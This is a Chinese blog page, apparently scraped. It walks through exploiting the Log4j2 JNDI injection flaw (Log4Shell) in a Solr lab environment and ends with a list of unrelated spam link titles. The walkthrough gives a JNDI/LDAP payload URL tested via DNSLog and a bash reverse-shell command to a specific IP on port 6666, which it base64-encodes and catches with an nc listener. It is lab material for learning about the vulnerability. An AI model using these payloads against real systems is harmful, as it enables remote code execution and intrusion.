当前位置: 首页 > wzjs >正文

长沙专业的网站设计传媒公司

长沙专业的网站设计,传媒公司,百度网址大全下载到桌面,王战胜局长log4j2 是Apache的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末 log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。 apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版…
log4j2 是Apache的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末 log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。 apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失

我们用云服务器执行命令,启动容器,开启靶场环境

 显示done就是启动成功

进入靶场

 

输入命令,利用dnslog来测试靶场,监视注入结果

 

 

在/solr/admin/cores?有个参数可以传,这就是个注入点,我们试试能不能输出java版本,构造payload,访问的url如下:

http://116.62.119.171:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.(dns获取的域名) }

如果存在log4j2漏洞,我们将在DNSLog平台看到回显,返回刚才的DNSLog平台,点击刷新记录Refresh Record

我们先编写恶意文件,将shell反弹到云服务器的6666端口上

因此对应的bash命令为

bash -i >& /dev/tcp/116.62.119.171/6666 0>&1

然后对上述命令进行base64编码

有了编码结果,我们就可以编写恶意文件 

 

 将得到的恶意文件拿到之前的网站进行注入

重新打开一个终端,开启nc监听6666端口

 反弹到shell,我们可以输入windows命令测试

原先的终端窗口也有消息

http://www.dtcms.com/wzjs/411456.html

相关文章:

  • 网站设计技术方案抖音推广合作方式
  • 沈阳有资质做网站的公司万能识图
  • 网站加速器免费指定关键词seo报价
  • 海南百度总代理青岛百度网站排名优化
  • 做网站要用到什么南宁网络推广品牌
  • 网站美化怎么做网络营销渠道名词解释
  • 做网站怎样上传文件班级优化大师下载安装
  • 佛山网站制作网页制作教育培训网站设计
  • wordpress深度修改南京seo按天计费
  • 代理网站建设公司登封网络推广公司
  • 1m带宽做网站怎么样竞价托管的注意事项
  • 潍坊网站制作价格新闻头条今日新闻下载
  • 外贸b2c网站建设百度开户代理
  • 苏州网站开发公司seo优化外包公司
  • 盘锦做网站的公司人工智能的关键词
  • 做b2b需要建网站吗百度智能云官网
  • 优秀企业站网站抖音搜索排名
  • 越南建设部网站今日最新消息
  • 满城做网站电话系统优化app
  • 有没有做市场评估的网站网站优化要多少钱
  • 苏州集团网站制作公司优化关键词规则
  • 做网站如何用模板优化网站最好的刷排名软件
  • 建设购物网站多少钱卖友情链接赚钱
  • html5video网站市场营销的八个理论
  • 二手车做网站的目的长春关键词搜索排名
  • 网站100m空间站长之家新网址
  • 深圳网站建设 手机网站建设网店推广是什么
  • 上海网站建设哪家五种网络营销推广方法
  • 华为云做的网站怎么样网站推广服务商
  • 兰州产品营销网站建设企业网站推广方案设计